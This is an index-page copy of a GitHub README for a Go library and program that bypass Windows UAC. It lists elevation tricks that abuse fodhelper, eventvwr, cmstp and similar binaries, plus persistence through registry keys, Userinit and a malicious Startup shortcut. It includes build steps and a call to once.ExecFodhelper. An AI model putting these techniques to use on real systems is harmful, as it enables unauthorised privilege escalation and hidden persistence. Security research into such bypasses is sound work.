Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/0x9ef/golang-uacbypasser

Windows UAC bypass techniques implemented and written in Go

access bypass elevate go golang uac uacbypass windows



# Golang UAC Bypasser
Collection of bypass techniques written in Golang.

A Golang rewrite of https://github.com/rootm0s/WinPwnage.

![Demonstration](image/demo.png)

Techniques are found online, on different blogs and repos here on GitHub. I do not take credit for any of the findings, thanks to all the researchers.

## Techniques implemented:
### Once
* Using cmstp.exe
* Using computerdefaults.exe
* Using eventvwr.exe
* Using fodhelper.exe
* Using sdcltcontrol.exe
* Using silentcleanup.exe
* Using slui.exe
* Using wsreset.exe

### Persist
* Using Cortana
* Using HKCU registry key manipulations
* Using HKLM registry key manipulations
* Using magnifier.exe
* Using People
* Using Startup folder and malicious lnk file
* Using Userinit registry key manipulations

## How to build:
1. `set CGO_ENABLED=0`
2. `go build -v -a main.go`

## How to use:
You can use this as a library for single method calls to the executor.
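```go
package main

import (
	"fmt"
	"os"
	"time"

	once "github.com/0x9ef/golang-uacbypasser/once"
)

func main() {
	// Path taken from the first command-line argument.
	path := os.Args[1]
	tstart := time.Now()
	// Single method call into the "once" package.
	err := once.ExecFodhelper(path)
	if err != nil {
		panic(err)
	}
	tend := time.Now()
	// Report how long the call took, in seconds.
	fmt.Printf("Time taken: %.2f\n", tend.Sub(tstart).Seconds())
}
```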

You can also use it as a program that automatically calls the selected methods.
More information is available by passing the `--help` flag.
```
main.exe --list --once --technique=TECHNIQUE
```

## If you find an error in the code or want to support the project, please commit your changes.